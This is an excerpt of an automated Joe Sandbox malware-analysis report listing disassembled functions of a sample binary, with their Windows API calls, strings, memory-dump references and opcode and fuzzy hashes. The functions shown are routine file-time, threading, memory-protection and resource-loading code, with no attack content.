    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
    • String ID: *?$.
    • API String ID: 2667617558-3972193922
    • Opcode ID: 972d5fe56fca4318eb32e817472c9c256f93d190f7b8c306b3a3f3d0056a7248
    • Instruction ID: 378db3d0ddb1496c3a2c605a850e9af1c1d25559ee00effd4572df8252e1b0f6
    • Opcode Fuzzy Hash: 972d5fe56fca4318eb32e817472c9c256f93d190f7b8c306b3a3f3d0056a7248
    • Instruction Fuzzy Hash: CE516F75E002199FEF14DFA8C891ABDB7F6FF58310F24816AE895E7341EA359A018B50
    Function 000480BE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 000480C3
      • Part of subcall function 00051900: _wcslen.LIBCMT ref: 00051906
      • Part of subcall function 0004B966: FindClose.KERNEL32(00000000,000000FF,?,?), ref: 0004B991
    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00048262
      • Part of subcall function 0004B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B8FA
      • Part of subcall function 0004B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B92B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
    • String ID: :
    • API String ID: 3226429890-336475711
    • Opcode ID: cc144ead933f8e9f70b5d9bf0732a47cf1c7f22c00bd52e30f31afa3e7add825
    • Instruction ID: 6f67b3508d3fb881d8973cb042afd8facc45b475a29647c7e2865a20dc96099d
    • Opcode Fuzzy Hash: cc144ead933f8e9f70b5d9bf0732a47cf1c7f22c00bd52e30f31afa3e7add825
    • Instruction Fuzzy Hash: 835162B1900558AAEB24EB60CD56EEE73BCEF45300F4084B9B609A6093DF745F89CF65
    Function 0005C66E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen
    • String ID: }
    • API String ID: 176396367-4239843852
    • Opcode ID: 13df317fe2b6ce9310a2a1edf9c4f16d893354b93e71b0eace8203da921e2f21
    • Instruction ID: 33f7340af1dface8157c68c0cb856636de5aec1821e65c7076eccc5543e103ee
    • Opcode Fuzzy Hash: 13df317fe2b6ce9310a2a1edf9c4f16d893354b93e71b0eace8203da921e2f21
    • Instruction Fuzzy Hash: 9321D43250831A5EE730EB64D845EAB77ECDF44751F04043AF944C7542EB64DD4C8BA2
    Function 00050695 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00050620: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0005063F
      • Part of subcall function 00050620: GetProcAddress.KERNEL32(0008A1F0,CryptUnprotectMemory), ref: 0005064F
    • GetCurrentProcessId.KERNEL32(?,00000200,?,00050690), ref: 00050723
    Strings
    • CryptUnprotectMemory failed, xrefs: 0005071B
    • CryptProtectMemory failed, xrefs: 000506DA
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AddressProc$CurrentProcess
    • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
    • API String ID: 2190909847-396321323
    • Opcode ID: 1a489ba890cf7459fa7789e7e9149c8e4b2e14dfa31185c9e76c4df1e30691b1
    • Instruction ID: c0dc488952a37f8dd3de5d6e072836d0b883c3bf1adab4b85494760ca993b326
    • Opcode Fuzzy Hash: 1a489ba890cf7459fa7789e7e9149c8e4b2e14dfa31185c9e76c4df1e30691b1
    • Instruction Fuzzy Hash: 6F113B31E042296BEF155F30DC4596F3B54EF44B61B014116FC096F252DB38AD968BD9
    Function 0004CDC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
    Download Yara Rule
    APIs
    • _swprintf.LIBCMT ref: 0004CDE7
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: __vswprintf_c_l_swprintf
    • String ID: %c:\
    • API String ID: 1543624204-3142399695
    • Opcode ID: 2e783734607ccb98ae4094abef8d7419affe2337a1032fd394dc3dca8be70fff
    • Instruction ID: 5b17889f944052741a5835313de9a46180dfcf21b08b7e8e9d894d0b46a3feba
    • Opcode Fuzzy Hash: 2e783734607ccb98ae4094abef8d7419affe2337a1032fd394dc3dca8be70fff
    • Instruction Fuzzy Hash: EB01F5A35053217AAA74A76A9C46EABA7ECEF95760B40442AF544C6082FB30D840C2E9
    Function 00060D6C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00060DAD
    • ___raise_securityfailure.LIBCMT ref: 00060E95
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FeaturePresentProcessor___raise_securityfailure
    • String ID: x=
    • API String ID: 3761405300-798900570
    • Opcode ID: c5555ea2f187126b93e9ab20b190d94ac5d2a37ffd32376d38ed99b8f4194fd5
    • Instruction ID: df265a063aeba02c70f8ddcfb64b1a30ee881f6b192cbfb01cf60457ed557d58
    • Opcode Fuzzy Hash: c5555ea2f187126b93e9ab20b190d94ac5d2a37ffd32376d38ed99b8f4194fd5
    • Instruction Fuzzy Hash: 0F21C4B5A40A00EEF750CF69F946644BBE5FB5A714F10512AF5488B2E0E3B9AA84CF44
    Function 00052337 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
    Download Yara Rule
    APIs
    • CreateThread.KERNEL32(00000000,00010000,00052470,?,00000000,00000000), ref: 0005235B
    • SetThreadPriority.KERNEL32(?,00000000), ref: 000523A2
      • Part of subcall function 000476E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00047707
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Thread$CreatePriority__vswprintf_c_l
    • String ID: CreateThread failed
    • API String ID: 2655393344-3849766595
    • Opcode ID: 80a49748f5eb7fdafc6b410adbd42856b6393c2a2be5c977972e20f24f3d1964
    • Instruction ID: f65d4d16c36e008a034aa9220247fcf1b160c98592c0de600877473b61c95ea9
    • Opcode Fuzzy Hash: 80a49748f5eb7fdafc6b410adbd42856b6393c2a2be5c977972e20f24f3d1964
    • Instruction Fuzzy Hash: D801F2B12447066FE3206F24DC81BA27399FF41712F20022DFB865A080CBA4A8858764
    Function 0006961A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 0006D0E0: GetEnvironmentStringsW.KERNEL32 ref: 0006D0E9
      • Part of subcall function 0006D0E0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006D10C
      • Part of subcall function 0006D0E0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006D132
      • Part of subcall function 0006D0E0: _free.LIBCMT ref: 0006D145
      • Part of subcall function 0006D0E0: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006D154
    • _free.LIBCMT ref: 00069660
    • _free.LIBCMT ref: 00069667
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
    • String ID: hB
    • API String ID: 400815659-2602534675
    • Opcode ID: 5ecf549f37bf2f83e269e5d8fb48ff019d1f311b143b6088cf2921fd81aa65fb
    • Instruction ID: 33159491429069e0040246b5bd7b56cce5fb032521eee44af32078db8740989e
    • Opcode Fuzzy Hash: 5ecf549f37bf2f83e269e5d8fb48ff019d1f311b143b6088cf2921fd81aa65fb
    • Instruction Fuzzy Hash: 4DE02B22E0A61041EA71327BEC01BEF024B4BC3370F620317F418D65C3DE78880201AA
    Function 000522FC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
    Download Yara Rule
    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF,00052516,?), ref: 00052302
    • GetLastError.KERNEL32(?), ref: 0005230E
      • Part of subcall function 000476E9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00047707
    Strings
    • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00052317
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
    • String ID: WaitForMultipleObjects error %d, GetLastError %d
    • API String ID: 1091760877-2248577382
    • Opcode ID: 67325199100991d75e78ae7eddcdd947538a81151eff37f86dd5caa2e81b7888
    • Instruction ID: fd3074b6553b110e0dcb20cffcf1d4f066cfc04db6881030fbf57b20f3d32bb0
    • Opcode Fuzzy Hash: 67325199100991d75e78ae7eddcdd947538a81151eff37f86dd5caa2e81b7888
    • Instruction Fuzzy Hash: 61D02B7190853033D60033286C09DEF38156F22730F210714F73D691F1CBBC0A8182E9
    Function 0004F5BE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
    Download Yara Rule
    APIs
    • GetModuleHandleW.KERNEL32(00000000,?,0004ED75,?), ref: 0004F5C3
    • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0004ED75,?), ref: 0004F5D1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: FindHandleModuleResource
    • String ID: RTL
    • API String ID: 3537982541-834975271
    • Opcode ID: c42be2ee0f956b024f7faa51d569bfe833ae1b5a475372e352065aacc15907fe
    • Instruction ID: 82d14217fb3c844b35353cb21214d7480c6beab1cf1754b944f2d7e1c21a539b
    • Opcode Fuzzy Hash: c42be2ee0f956b024f7faa51d569bfe833ae1b5a475372e352065aacc15907fe
    • Instruction Fuzzy Hash: 20C01271A4475066E63027716C0DB832E9C5B00715F054458B709EA1C0DBFDC88086A4